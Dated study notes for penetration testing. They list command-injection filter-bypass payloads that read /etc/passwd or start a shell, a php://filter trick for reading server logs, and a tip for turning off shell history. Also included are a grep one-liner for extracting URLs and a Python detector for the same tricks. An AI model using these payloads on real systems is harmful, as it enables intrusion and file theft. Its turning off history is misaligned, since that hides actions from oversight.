Miscellaneous tricks (study notes)

2021-11-3


Use a grep regex to pull the important pieces (URLs) out of HTML or JavaScript:

curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"


Command injection bypasses (quoting, globbing, empty expansions, encoding):

cat /etc/passwd
cat /e"t"c/pa"s"swd
cat /'e'tc/pa's' swd
cat /etc/pa??wd
cat /etc/pa*wd
cat /et' 'c/passw' 'd
cat /et$()c/pa$()$swd
cat /et${neko}c/pas${poi} swd
echo "dwssap/cte/ tac" | rev
$(echo Y2FOIC9ldGMvcGFzc3dkCg== | base64 -d)
w\ho\am\i
/\b\i\n/////s\h
who$@ami
xyz%0Acat%20/etc/passwd
IFS=,;`cat<<<uname,-a`
/???/??t /???/p??s??
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
cat /???/?????d
{cat,/etc/passwd}
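Every trick above relies on the shell undoing the obfuscation before it executes, so a blocklist that matches the raw parameter is easy to miss. The following detection helper is an added example (not from the original post): it applies the same normalization bash would (URL decoding, quote and backslash removal, empty `$()`/`${var}`/`$@` expansions, brace expansion, `//` collapse), also inspects what `rev` and `base64 -d` stages would yield, and reports why a parameter looks like injection. Sample inputs in the test are constructed; the only assumption is that the caller passes the raw request parameter value.

```python
import base64
import re
from urllib.parse import unquote

# Strings a shell-command parameter of a web app should never carry (illustrative list).
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/bin/sh", "whoami", "uname")


def normalize(cmd):
    """Collapse the quoting/expansion tricks the shell itself would collapse."""
    s = unquote(cmd)                                    # %0A, %20 ...
    s = s.replace("\\", "")                             # w\ho\am\i -> whoami
    s = re.sub(r"\$\(\s*\)", "", s)                     # $() expands to nothing
    s = re.sub(r"\$\{[A-Za-z_]\w*\}|\$[A-Za-z_]\w*|\$@", "", s)  # unset ${var}, $var, $@
    s = re.sub(r"\{([^{}]*,[^{}]*)\}",                  # {cat,/etc/passwd} -> cat /etc/passwd
               lambda m: m.group(1).replace(",", " "), s)
    s = s.replace("'", "").replace('"', "")             # quotes are removed by the shell
    return re.sub(r"/+", "/", s)                        # /bin/////sh -> /bin/sh


def decode_layers(s):
    """Return the normalized string plus what `rev` and `base64 -d` stages would produce."""
    views = [s]
    if re.search(r"\|\s*rev\b", s):
        views.append(s[::-1])
    if "base64" in s:
        for tok in re.findall(r"[A-Za-z0-9+/]{8,}={0,2}", s):
            try:
                views.append(base64.b64decode(tok, validate=True).decode("utf-8", "replace"))
            except ValueError:
                pass                                    # not a real base64 token
    return views


def check_command(raw):
    """Return the (sorted, de-duplicated) reasons a parameter looks like command injection."""
    reasons = set()
    norm = normalize(raw)
    for view in decode_layers(norm):
        for needle in SENSITIVE:
            if needle in view:
                reasons.add(f"sensitive token {needle!r}")
    if re.search(r"(^|\s)/[^\s]*[?*]", norm):           # /???/??t, /etc/pa*wd
        reasons.add("wildcard in path")
    if re.search(r"[;|&`\n]|\$[({]", norm):             # chaining, backticks, $(..), ${..}
        reasons.add("command separator or expansion")
    if "IFS=" in norm:
        reasons.add("IFS override")
    return sorted(reasons)
```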

php://filter when the string "base" (as in base64) is filtered:

action=php://filter/read=string.toupper|string.rot13/resource=/var/log/nginx/access.log

set +o history: stop recording commands in the shell history

set -o history: resume recording